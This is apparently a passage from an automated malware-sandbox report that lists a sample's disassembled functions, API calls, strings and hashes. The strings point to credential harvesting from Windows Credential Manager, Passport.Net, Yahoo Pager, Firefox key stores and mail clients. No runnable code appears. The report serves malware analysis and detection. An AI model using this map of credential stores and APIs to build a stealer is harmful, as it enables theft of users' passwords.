                                                                                                                  • Opcode ID: 8b1d9e4dc4f74ac6a4b9f20da3a4dce8e7e5bfac1d9ec588bc9247bb7228e3eb
                                                                                                                  • Instruction ID: 75a67b34ad05bb499385cce9778aa698b1b4849105f4284936cacb9952f60aa3
                                                                                                                  • Opcode Fuzzy Hash: 8b1d9e4dc4f74ac6a4b9f20da3a4dce8e7e5bfac1d9ec588bc9247bb7228e3eb
                                                                                                                  • Instruction Fuzzy Hash: 291121B680112CBEFB119BA4DCC5EEB73ADDF09355F0005A6B715D2092E6349F448B78
                                                                                                                  Function 0040C143 Relevance: 9.1, APIs: 6, Instructions: 54fileclipboardCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                                                                                                                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                                                                                                                  • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                                                                                                                  • OpenClipboard.USER32(?), ref: 0040C1B1
                                                                                                                  • GetLastError.KERNEL32 ref: 0040C1CA
                                                                                                                  • DeleteFileA.KERNEL32(00000000), ref: 0040C1E7
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2014771361-0
                                                                                                                  • Opcode ID: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                                                                  • Instruction ID: f62812a52b3c8d3971b783ccdfc9367edaf682a71d5855f6ec34303c2df0b61c
                                                                                                                  • Opcode Fuzzy Hash: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                                                                  • Instruction Fuzzy Hash: 69115276600218ABDB609B61DCCDFCB77BC9F15705F0401B6B685E60A2EBB499848F68
                                                                                                                  Function 0040613B Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 51COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • memcmp.MSVCRT(-00000001,00456EA0,00000010,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 00406151
                                                                                                                    • Part of subcall function 0040607F: memcmp.MSVCRT(00000000,0040616C,00000004,00000000), ref: 0040609D
                                                                                                                    • Part of subcall function 0040607F: memcpy.MSVCRT(00000268,0000001A,?,00000000), ref: 004060CC
                                                                                                                    • Part of subcall function 0040607F: memcpy.MSVCRT(-00000368,0000001F,00000060,00000268,0000001A,?,00000000), ref: 004060E1
                                                                                                                  • memcmp.MSVCRT(-00000001,password-check,0000000E,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 0040617C
                                                                                                                  • memcmp.MSVCRT(-00000001,global-salt,0000000B,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 004061A4
                                                                                                                  • memcpy.MSVCRT(0000013F,00000000,00000000), ref: 004061C1
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memcmp$memcpy
                                                                                                                  • String ID: global-salt$password-check
                                                                                                                  • API String ID: 231171946-3927197501
                                                                                                                  • Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                                                                  • Instruction ID: a9589356fa14544f03300d4f181c1951213ca66e4b0bd31de1399f3a3b520bb8
                                                                                                                  • Opcode Fuzzy Hash: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                                                                  • Instruction Fuzzy Hash: BB01FC70A003446EEF212A128C02B4F37569F50769F014037FE0A782C3E67DD679864D
                                                                                                                  Function 00443473 Relevance: 9.0, APIs: 6, Instructions: 46COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,0044418F,004441FB,?,00000000), ref: 00443481
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 0044349C
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434B2
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434C8
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434DE
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434F4
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: ??3@
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 613200358-0
                                                                                                                  • Opcode ID: ae7dc868dc48665b139d307d1f96ab593ff6b37e90ec57b5cf83d7c40c642e89
                                                                                                                  • Instruction ID: 2c47959068043e69134c65afad444586b1a09f576c08bcd621988c2a5a0f38ec
                                                                                                                  • Opcode Fuzzy Hash: ae7dc868dc48665b139d307d1f96ab593ff6b37e90ec57b5cf83d7c40c642e89
                                                                                                                  • Instruction Fuzzy Hash: 3C016272E46D7167E2167E326402B8FA358AF40F2BB16010FF80477682CB2CBE5045EE
                                                                                                                  Function 00401694 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetClientRect.USER32(?,?), ref: 004016A3
                                                                                                                  • GetSystemMetrics.USER32(00000015), ref: 004016B1
                                                                                                                  • GetSystemMetrics.USER32(00000014), ref: 004016BD
                                                                                                                  • BeginPaint.USER32(?,?), ref: 004016D7
                                                                                                                  • DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016E6
                                                                                                                  • EndPaint.USER32(?,?), ref: 004016F3
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 19018683-0
                                                                                                                  • Opcode ID: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                                                                                  • Instruction ID: cf01e476fd02228c824cf2568a7310e823bc3a91870265851f050ef0b1242b16
                                                                                                                  • Opcode Fuzzy Hash: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                                                                                  • Instruction Fuzzy Hash: 81012C76900218AFDF44DFE4DC849EE7B79FB45301F040569EA11AA1A4DAB0A904CB50
                                                                                                                  Function 004063B2 Relevance: 8.9, APIs: 7, Instructions: 157COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0040644F
                                                                                                                  • memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                                                                  • memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                                                                    • Part of subcall function 00404888: memset.MSVCRT ref: 004048C2
                                                                                                                    • Part of subcall function 00404888: memset.MSVCRT ref: 004048D6
                                                                                                                    • Part of subcall function 00404888: memset.MSVCRT ref: 004048EA
                                                                                                                    • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                                                                                                    • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                                                                                                  • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,00000060,?,?,?,00000040,00406667,?,?,?), ref: 004064B9
                                                                                                                  • memcpy.MSVCRT(?,00000060,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004064CC
                                                                                                                  • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,?,?,?,?,?,?,?,?,?), ref: 004064F9
                                                                                                                  • memcpy.MSVCRT(?,?,00000014,?,?,?,?,?,?,?,?,?), ref: 0040650E
                                                                                                                    • Part of subcall function 00406286: memcpy.MSVCRT(?,?,00000008,?,?,?,?,?), ref: 004062B2
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpy$memset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 438689982-0
                                                                                                                  • Opcode ID: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                                                                                  • Instruction ID: e4a864fa4e69ec142fe4fd7b7713e32d962165e503c4b70a0fc0dcfbb4c29d3a
                                                                                                                  • Opcode Fuzzy Hash: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                                                                                  • Instruction Fuzzy Hash: 41415FB290054DBEEB51DAE9CC41EEFBB7CAB48344F004476F708F7151E634AA498BA5
                                                                                                                  Function 0044493E Relevance: 8.9, APIs: 7, Instructions: 147stringCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0044495F
                                                                                                                  • memset.MSVCRT ref: 00444978
                                                                                                                  • memset.MSVCRT ref: 0044498C
                                                                                                                    • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                                                                                  • strlen.MSVCRT ref: 004449A8
                                                                                                                  • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 004449CD
                                                                                                                  • memcpy.MSVCRT(?,?,00000008,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 004449E3
                                                                                                                    • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                                    • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                                                                                    • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                                                                                    • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                                    • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                                                                                  • memcpy.MSVCRT(?,?,00000008,?,?,?,?,00000008,?,00000000,00000000), ref: 00444A23
                                                                                                                    • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                                    • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                                    • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpymemset$strlen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2142929671-0
                                                                                                                  • Opcode ID: 222256a1374bd43cf022861c561c1c3192c4ec1bcf54050736f6a4219f509775
                                                                                                                  • Instruction ID: aa4dc9b89352709bd4c521be83aedc2b1fb2a96970f66ede65b30d7c79a4835d
                                                                                                                  • Opcode Fuzzy Hash: 222256a1374bd43cf022861c561c1c3192c4ec1bcf54050736f6a4219f509775
                                                                                                                  • Instruction Fuzzy Hash: 96513B7290015DAFDB10EF95CC81AEEB7B8FB44308F5445AAE509A7141EB34EA898F94
                                                                                                                  Function 0040F6E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 97stringCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                                                                    • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                                                    • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                                                    • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                                                    • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                                                    • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                                                    • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                                                    • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                    • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000100,000000FF,00000000,00000000,?,?,?,?,00000000), ref: 0040F7AE
                                                                                                                  • strlen.MSVCRT ref: 0040F7BE
                                                                                                                  • _mbscpy.MSVCRT(00000000,?,?,00000000), ref: 0040F7CF
                                                                                                                  • LocalFree.KERNEL32(00000000,?,00000000), ref: 0040F7DC
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc$LibraryLoad_mbscpy$ByteCharFreeLocalMultiWidestrlen
                                                                                                                  • String ID: Passport.Net\*
                                                                                                                  • API String ID: 2329438634-3671122194
                                                                                                                  • Opcode ID: ac5e77b6697e9ee94173e4e8c28d13e758311ae62a0014aa2ab67cc322a84761
                                                                                                                  • Instruction ID: cbd5109d0b46f6ae46d16b49076c688dceaf9cc559dd015bf255ce3d8649dee3
                                                                                                                  • Opcode Fuzzy Hash: ac5e77b6697e9ee94173e4e8c28d13e758311ae62a0014aa2ab67cc322a84761
                                                                                                                  • Instruction Fuzzy Hash: 98316F76900109ABDB10EFA6DD45DAEB7B9EF89300F10007BE605F7291DB389A04CB59
                                                                                                                  Function 004032B7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82stringCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
                                                                                                                  • memset.MSVCRT ref: 0040330B
                                                                                                                  • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
                                                                                                                  • strchr.MSVCRT ref: 0040335A
                                                                                                                    • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
                                                                                                                  • strlen.MSVCRT ref: 0040339C
                                                                                                                    • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                                                                                                  • String ID: Personalities
                                                                                                                  • API String ID: 2103853322-4287407858
                                                                                                                  • Opcode ID: 5b98b57a55da65def1d776efa7645d3f4e73defe10c1c776d6f69e105cfa83b8
                                                                                                                  • Instruction ID: 7d10b282734f65fdb38f5d5bab0bdada953f1de7ece3d1168d652590bcd45cd6
                                                                                                                  • Opcode Fuzzy Hash: 5b98b57a55da65def1d776efa7645d3f4e73defe10c1c776d6f69e105cfa83b8
                                                                                                                  • Instruction Fuzzy Hash: 6C21A872A041486AEB11EF699C81ADEBB7C9B51305F14007BFB04F7181DA7CDB46C66D
                                                                                                                  Function 00444551 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 51registryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 00444573
                                                                                                                    • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                                                                    • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseOpenQueryValuememset
                                                                                                                  • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                                                                                                                  • API String ID: 1830152886-1703613266
                                                                                                                  • Opcode ID: c25afbc6681bd6f67a4f4f243a5a512b3b390374a029d0210c15856865fede48
                                                                                                                  • Instruction ID: e49b40feb516e52fd010a51085a75c79e183d02607987ed0dc43077d9115a6c0
                                                                                                                  • Opcode Fuzzy Hash: c25afbc6681bd6f67a4f4f243a5a512b3b390374a029d0210c15856865fede48
                                                                                                                  • Instruction Fuzzy Hash: E80196B6A00118BBEF11AA569D01F9A777CDF90355F1000A6FF08F2212E6749F599698
                                                                                                                  Function 00406D77 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetLastError.KERNEL32(?), ref: 00406D87
                                                                                                                  • sprintf.MSVCRT ref: 00406DAF
                                                                                                                  • MessageBoxA.USER32(00000000,?,Error,00000030), ref: 00406DC8
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLastMessagesprintf
                                                                                                                  • String ID: Error$Error %d: %s
                                                                                                                  • API String ID: 1670431679-1552265934
                                                                                                                  • Opcode ID: 01084951b307502bfaf43d4fbd3e54dffba0eab1b535d90173241ec551fbeaa7
                                                                                                                  • Instruction ID: a7eabb7ac59324d00fe13b249bdc4a7432a02f94c8438c44d3dfd779c6ab1540
                                                                                                                  • Opcode Fuzzy Hash: 01084951b307502bfaf43d4fbd3e54dffba0eab1b535d90173241ec551fbeaa7
                                                                                                                  • Instruction Fuzzy Hash: AEF0A77A8001086BDB10A7A4DC05FA676BCBB44344F1500B6B945F2151EA74DA058F98
                                                                                                                  Function 004309ED Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 238COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  • unknown column "%s" in foreign key definition, xrefs: 00430C59
                                                                                                                  • foreign key on %s should reference only one column of table %T, xrefs: 00430A3D
                                                                                                                  • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00430A65
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpy
                                                                                                                  • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                  • API String ID: 3510742995-272990098
                                                                                                                  • Opcode ID: e0adb55311b2422536510ae49f56a80dd71403a501fe8d14b1b43f202caa477a
                                                                                                                  • Instruction ID: 56a33166dce8f22c91c9f8fabbbf61fd3f81eb66f6c7064346fd2a8112c6bbd6
                                                                                                                  • Opcode Fuzzy Hash: e0adb55311b2422536510ae49f56a80dd71403a501fe8d14b1b43f202caa477a
                                                                                                                  • Instruction Fuzzy Hash: 32A14A71A00209DFCB14DF98D5909AEBBF1FF49704F24925EE805AB312D739EA41CB98
                                                                                                                  Function 0043D62C Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 224COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memset
                                                                                                                  • String ID: H
                                                                                                                  • API String ID: 2221118986-2852464175
                                                                                                                  • Opcode ID: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                                                                                  • Instruction ID: 41a1901620add3bbd0c629c105807ca0f7ae5b253a5bd6696a221ab72d79fc9a
                                                                                                                  • Opcode Fuzzy Hash: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                                                                                  • Instruction Fuzzy Hash: C0916C75D00219DFDF24DFA5D881AEEB7B5FF48300F10849AE959AB201E734AA45CF98
                                                                                                                  Function 0042563B Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 176COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpy
                                                                                                                  • String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
                                                                                                                  • API String ID: 3510742995-3170954634
                                                                                                                  • Opcode ID: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                                                                                  • Instruction ID: e987c9c84479fff69dc62f11a90029b17cbd8b5ab9a96ddea988199e68ce63eb
                                                                                                                  • Opcode Fuzzy Hash: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                                                                                  • Instruction Fuzzy Hash: 2361C235B006259FCB04DF68E484BAEFBF1BF44314F55809AE904AB352D738E980CB98
                                                                                                                  Function 0041DB51 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 176COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0041384F: memcpy.MSVCRT(?,00417664,00000004,?,CwA,00417664,?,?,00417743,?,?,?,?), ref: 0041385C
                                                                                                                  • memcmp.MSVCRT(?,?,00000004,00000000,?,?,0041DE5E,?,?,?,?,00436073), ref: 0041DBAE
                                                                                                                  • memcmp.MSVCRT(?,SQLite format 3,00000010,00000000,?,?,0041DE5E,?,?,?), ref: 0041DBDB
                                                                                                                  • memcmp.MSVCRT(?,@ ,00000003,?,?,?,00000000,?,?,0041DE5E,?,?,?), ref: 0041DC47
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memcmp$memcpy
                                                                                                                  • String ID: @ $SQLite format 3
                                                                                                                  • API String ID: 231171946-3708268960
                                                                                                                  • Opcode ID: 88de2badfc1d71e4fe38edb0c0075e708ac09094af51dabb08af60798be72297
                                                                                                                  • Instruction ID: bab8e9e22e0f3e3322208b515ecc9156aa125374c4e71f07eecd891e4e8170cf
                                                                                                                  • Opcode Fuzzy Hash: 88de2badfc1d71e4fe38edb0c0075e708ac09094af51dabb08af60798be72297
                                                                                                                  • Instruction Fuzzy Hash: 1851BFB1E002099BDB20DF69C981BEAB7F4AF54304F10056FE44597742E7B8EA85CB98
                                                                                                                  Function 00414625 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 132COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpy$memset
                                                                                                                  • String ID: winWrite1$winWrite2
                                                                                                                  • API String ID: 438689982-3457389245
                                                                                                                  • Opcode ID: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                                                                                  • Instruction ID: c2532708ffcca3880dfc28061b61c902a2330187b6102c2a8a28e688d44e82e0
                                                                                                                  • Opcode Fuzzy Hash: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                                                                                  • Instruction Fuzzy Hash: 86418072A00209EBDF00DF95CC85BDE7775FF85315F14411AE924A7280D778EAA4CB99
                                                                                                                  Function 004144FD Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 109COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpymemset
                                                                                                                  • String ID: winRead
                                                                                                                  • API String ID: 1297977491-2759563040
                                                                                                                  • Opcode ID: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
